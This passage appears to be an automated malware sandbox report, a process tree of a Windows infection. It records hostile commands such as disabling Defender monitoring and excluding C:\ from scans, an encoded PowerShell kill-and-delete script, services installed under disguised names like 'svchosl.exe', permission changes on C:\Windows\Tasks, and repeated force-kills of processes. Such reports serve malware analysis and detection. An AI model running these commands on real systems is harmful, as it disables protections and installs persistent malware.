- Suspicious use of WriteProcessMemory
PID:7632

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\programdata\MicrosoftSystem\run.bat" "
3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:7736

C:\programdata\MicrosoftSystem\Wmiic.exe
"C:\programdata\MicrosoftSystem\wmiic.exe" install MicrosoftESS svchosl.exe
4⤵
- Executes dropped EXE
PID:7796

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 1 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:7828

C:\programdata\MicrosoftSystem\Wmiic.exe
"C:\programdata\MicrosoftSystem\wmiic" start MicrosoftESS
4⤵
- Executes dropped EXE
PID:7912

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 2 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:7928

C:\Windows\SysWOW64\net.exe
net start MicrosoftESS
4⤵
- Suspicious use of WriteProcessMemory
PID:1176

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start MicrosoftESS
5⤵
PID:2096

C:\users\mig.exe
"C:\users\mig.exe"
2⤵
- Executes dropped EXE
PID:3280

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $True
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3472

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath c:\
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3688

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIABzAHQAbwBwACAAdwBtAHMAZQByAHYAaQBjAGUACgB0AGEAcwBrAGsAaQBsAGwAIAAvAGYAIAAvAGkAbQAgAG0AaQBnAHIAYQB0AGUALgBlAHgAZQAKAHQAYQBzAGsAawBpAGwAbAAgAC8AZgAgAC8AaQBtACAASQBuAHQAZQBsAEMAbwBuAGYAaQBnAFMAZQByAHYAaQBjAGUALgBlAHgAZQAKAHQAYQBzAGsAawBpAGwAbAAgAC8AZgAgAC8AaQBtACAATQBTAFQAYQBzAGsALgBlAHgAZQAKAHQAYQBzAGsAawBpAGwAbAAgAC8AZgAgAC8AaQBtACAAUwB1AHAAZQByAGYAZQB0AGMAaAAuAGUAeABlAAoAdABhAHMAawBrAGkAbABsACAALwBmACAALwBpAG0AIABXAG0AaQBpAGMALgBlAHgAZQAKAHQAYQBzAGsAawBpAGwAbAAgAC8AZgAgAC8AaQBtACAAVwByAGEAcAAuAGUAeABlAAoAYwBtAGQAIAAvAGMAIAB0AGEAawBlAG8AdwBuACAALwBGACAAIgBjADoAXAB3AGkAbgBkAG8AdwBzAFwAdABhAHMAawBzACIACgBzAGMAaAB0AGEAcwBrAHMAIAAvAGQAZQBsAGUAdABlACAALwB0AG4AIAAiAFcAaQBuAGQAbwB3AHMAVQBwAGQAYQB0AGUAIgAgAC8ARgAKAGMAbQBkACAALwBjACAAdABhAGsAZQBvAHcAbgAgAC8ARgAgACIAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbQBpAGcAcgBhAHQAZQAuAGUAeABlACIACgBjAG0AZAAgAC8AYwAgAGQAZQBsACAALwBGACAALwBRACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABtAGkAZwByAGEAdABlAC4AZQB4AGUAIgAKAAoA
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2752

C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" stop wmservice
4⤵
PID:2512

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wmservice
5⤵
PID:2924

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\system32\taskkill.exe" /f /im migrate.exe
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2736

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\system32\taskkill.exe" /f /im IntelConfigService.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4144

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\system32\taskkill.exe" /f /im MSTask.exe
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4184

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\system32\taskkill.exe" /f /im Superfetch.exe
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4248

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\system32\taskkill.exe" /f /im Wmiic.exe
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4308

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\system32\taskkill.exe" /f /im Wrap.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4376

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c takeown /F c:\windows\tasks
4⤵
PID:2868

C:\Windows\SysWOW64\takeown.exe
takeown /F c:\windows\tasks
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4448

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /delete /tn WindowsUpdate /F
4⤵
PID:4468

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c takeown /F C:\ProgramData\migrate.exe
4⤵
PID:4488

C:\Windows\SysWOW64\takeown.exe
takeown /F C:\ProgramData\migrate.exe
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4504

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /F /Q C:\ProgramData\migrate.exe
4⤵
PID:4528

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\programdata\ru.bat" "
3⤵
PID:4800

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K "c:\programdata\st.bat"
4⤵
- Loads dropped DLL
PID:4888

C:\Windows\SysWOW64\chcp.com
chcp 65001
5⤵
PID:4932

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq Superfetch.exe"
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4972

C:\Windows\SysWOW64\find.exe
find /I /N "Superfetch.exe"
5⤵
PID:4992

C:\Windows\SysWOW64\takeown.exe
takeown /f c:\windows\tasks
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5084

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 3 /NOBREAK
5⤵
- Delays execution with timeout.exe
PID:5100

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $True
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2536

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -ExclusionPath c:\
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6304

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6556

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)"
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6616

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "Administrators:(R,REA,RA,RD)"
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6696

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "Users:(R,REA,RA,RD)"
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6732

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "Admin:(R,REA,RA,RD)"
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6756

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "Admin:(R,REA,RA,RD)"
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6784

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)"
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6820

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 3 /NOBREAK
5⤵
- Delays execution with timeout.exe
PID:6864

\??\c:\programdata\migrate.exe
c:\programdata\migrate.exe -p4432
5⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:6924

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\windows\tasks\run.bat" "
6⤵
- Loads dropped DLL
PID:2860

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 1 /NOBREAK
7⤵
- Delays execution with timeout.exe
PID:1572

C:\windows\tasks\Wmiic.exe
"C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe
7⤵
- Executes dropped EXE
PID:2340

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 1 /NOBREAK
7⤵
- Delays execution with timeout.exe
PID:2672

C:\windows\tasks\Wmiic.exe
"C:\windows\tasks\wmiic" start WMService
7⤵
- Executes dropped EXE
PID:2296

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 2 /NOBREAK
7⤵
- Delays execution with timeout.exe
PID:3064

C:\Windows\SysWOW64\net.exe
net start WMService
7⤵
PID:552

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start WMService
8⤵
PID:1696

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 3 /NOBREAK
5⤵
- Delays execution with timeout.exe
PID:1476

C:\programdata\MicrosoftSystem\Wmiic.exe
C:\programdata\MicrosoftSystem\Wmiic.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:7956

C:\programdata\MicrosoftSystem\svchosl.exe
"svchosl.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:8008

C:\programdata\MicrosoftSystem\svchosl.exe
"svchosl.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:8112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v1.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:2000

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp_modul_v1.exe
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v2.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:1908

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp_modul_v2.exe
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2172

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v3.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:2572

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp_modul_v3.exe
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:672

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v1.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:2448

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v1.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v2.exe
4⤵
PID:444

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v2.exe
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v3.exe
4⤵
PID:348

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v3.exe
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:692

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im ape_modul_v1.exe
4⤵
PID:2192

C:\Windows\system32\taskkill.exe
taskkill /f /im ape_modul_v1.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1156

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im full_rdp_modul_v1.exe
4⤵
PID:892

C:\Windows\system32\taskkill.exe
taskkill /f /im full_rdp_modul_v1.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp.exe
4⤵
PID:1960

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp.exe
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v4.exe
4⤵
PID:2636

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v4.exe
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im nl.exe
4⤵
PID:2524

C:\Windows\system32\taskkill.exe
taskkill /f /im nl.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2324

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im WerFault.exe
4⤵
PID:3124

C:\Windows\system32\taskkill.exe
taskkill /f /im WerFault.exe
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3140

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v1.exe
4⤵
PID:5116

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp_modul_v1.exe
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v2.exe
4⤵
PID:628

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp_modul_v2.exe
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2848

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v3.exe
4⤵
PID:5208

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp_modul_v3.exe
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:5220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v1.exe
4⤵
PID:5312

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v1.exe
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:5340

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v2.exe
4⤵
PID:5424

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v2.exe
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:5444

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v3.exe
4⤵
PID:5524

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v3.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5576

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im ape_modul_v1.exe
4⤵
PID:5636

C:\Windows\system32\taskkill.exe
taskkill /f /im ape_modul_v1.exe
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:5660

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im full_rdp_modul_v1.exe
4⤵
PID:5736

C:\Windows\system32\taskkill.exe
taskkill /f /im full_rdp_modul_v1.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp.exe
4⤵
PID:5824

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5840

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v4.exe
4⤵
PID:5900

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v4.exe
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:5916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im nl.exe
4⤵
PID:5996

C:\Windows\system32\taskkill.exe
taskkill /f /im nl.exe
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:6024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im WerFault.exe
4⤵
PID:6076

C:\Windows\system32\taskkill.exe
taskkill /f /im WerFault.exe
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2452

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v1.exe
4⤵
PID:3256

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp_modul_v1.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3276

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v2.exe
4⤵
PID:3428

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp_modul_v2.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3452

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v3.exe
4⤵
PID:3988

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp_modul_v3.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v1.exe
4⤵
PID:4464

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v1.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4576

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v2.exe
4⤵
PID:5064

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v2.exe
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2476

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v3.exe
4⤵
PID:3000

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v3.exe
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im ape_modul_v1.exe
4⤵
PID:5280

C:\Windows\system32\taskkill.exe
taskkill /f /im ape_modul_v1.exe
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:5332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im full_rdp_modul_v1.exe
4⤵
PID:6004

C:\Windows\system32\taskkill.exe
taskkill /f /im full_rdp_modul_v1.exe
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:6108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp.exe
4⤵
PID:6216

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6312

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v4.exe
4⤵
PID:6592

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v4.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im nl.exe
4⤵
PID:7108

C:\Windows\system32\taskkill.exe
taskkill /f /im nl.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2276

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im WerFault.exe
4⤵
PID:7172

C:\Windows\system32\taskkill.exe
taskkill /f /im WerFault.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v1.exe
4⤵
PID:2168

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp_modul_v1.exe
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1420

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v2.exe
4⤵
PID:1456

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp_modul_v2.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1684

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v3.exe
4⤵
PID:836

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp_modul_v3.exe
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v1.exe
4⤵
PID:2444

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v1.exe
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1152

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v2.exe
4⤵
PID:4156

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v2.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v3.exe
4⤵
PID:4668

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v3.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im ape_modul_v1.exe
4⤵
PID:3824

C:\Windows\system32\taskkill.exe
taskkill /f /im ape_modul_v1.exe
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4180

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im full_rdp_modul_v1.exe
4⤵
PID:4544

C:\Windows\system32\taskkill.exe
taskkill /f /im full_rdp_modul_v1.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp.exe
4⤵
PID:3468

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v4.exe
4⤵
PID:4656

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v4.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4276

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im nl.exe
4⤵
PID:3980

C:\Windows\system32\taskkill.exe
taskkill /f /im nl.exe
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im WerFault.exe
4⤵
PID:4508

C:\Windows\system32\taskkill.exe
taskkill /f /im WerFault.exe
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v1.exe
4⤵
PID:3516

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp_modul_v1.exe
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v2.exe
4⤵
PID:4088

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp_modul_v2.exe
5⤵
- Kills process with taskkill
PID:4444

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v3.exe
4⤵
PID:3792

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp_modul_v3.exe
5⤵
PID:3396

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v1.exe
4⤵
PID:4112

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v1.exe
5⤵
- Kills process with taskkill
PID:4460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v2.exe
4⤵
PID:4432

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v2.exe
5⤵
PID:4000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v3.exe
4⤵
PID:3784

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v3.exe
5⤵
PID:3364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im ape_modul_v1.exe
4⤵
PID:3952

C:\Windows\system32\taskkill.exe
taskkill /f /im ape_modul_v1.exe
5⤵
PID:3476

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im full_rdp_modul_v1.exe
4⤵
PID:3552

C:\Windows\system32\taskkill.exe
taskkill /f /im full_rdp_modul_v1.exe
5⤵
- Kills process with taskkill
PID:4304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp.exe
4⤵
PID:2608

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp.exe
5⤵
PID:3732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v4.exe
4⤵
PID:3724

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v4.exe
5⤵
- Kills process with taskkill
PID:3632

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im nl.exe
4⤵
PID:3596

C:\Windows\system32\taskkill.exe
taskkill /f /im nl.exe
5⤵
PID:3588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im WerFault.exe
4⤵
PID:4744

C:\Windows\system32\taskkill.exe
taskkill /f /im WerFault.exe
5⤵
- Kills process with taskkill
PID:4760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v1.exe
4⤵
PID:4924

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp_modul_v1.exe
5⤵
- Kills process with taskkill
PID:4936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v2.exe
4⤵
PID:4984

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp_modul_v2.exe
5⤵
PID:4996

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v3.exe
4⤵
PID:5036

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp_modul_v3.exe
5⤵
PID:5048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v1.exe
4⤵
PID:5104

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v1.exe
5⤵
PID:2788

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v2.exe
4⤵
PID:2732

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v2.exe
5⤵
PID:2496

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v3.exe
4⤵
PID:3024

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v3.exe
5⤵
- Kills process with taskkill
PID:1716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im ape_modul_v1.exe
4⤵
PID:5152

C:\Windows\system32\taskkill.exe
taskkill /f /im ape_modul_v1.exe
5⤵
- Kills process with taskkill
PID:5168

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im full_rdp_modul_v1.exe
4⤵
PID:5224

C:\Windows\system32\taskkill.exe
taskkill /f /im full_rdp_modul_v1.exe
5⤵
- Kills process with taskkill
PID:5240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp.exe
4⤵
PID:5288

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp.exe
5⤵
- Kills process with taskkill
PID:5300

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v4.exe
4⤵
PID:5348

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v4.exe
5⤵
- Kills process with taskkill
PID:5364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im nl.exe
4⤵
PID:5420

C:\Windows\system32\taskkill.exe
taskkill /f /im nl.exe
5⤵
- Kills process with taskkill
PID:5436

C:\Windows\system32\cmd.exe
